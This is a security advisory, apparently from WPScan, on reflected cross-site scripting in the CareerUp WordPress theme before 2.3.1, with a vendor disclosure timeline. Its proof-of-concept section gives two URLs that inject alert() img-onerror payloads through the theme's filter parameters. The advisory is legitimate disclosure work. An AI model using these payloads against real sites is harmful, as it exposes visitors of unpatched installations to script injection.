CareerUp < 2.3.1 - Unauthenticated Reflected Cross-Site Scripting

Description

There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp theme, via the filter parameters.

Edit (WPScanTeam)

May 27th, 2020 - Vendor Contacted by Original Submitter.

May 29th, 2020 - v2.3.0 Released. Unclear if issue fixed.

June 18th, 2020 - Another submitter (Vlad Vector) reported the same issue. Report escalated to Envato
June 18th, 2020 - v2.3.1 released. Issue confirmed to be fixed.

Proof of Concept

https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-center-location=&filter-center-latitude=&filter-center-longitude=&filter-distance=50



https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E 

References

https://wpscan.com/vulnerability/a30a1430-c474-4cd1-877c-35c4ab624170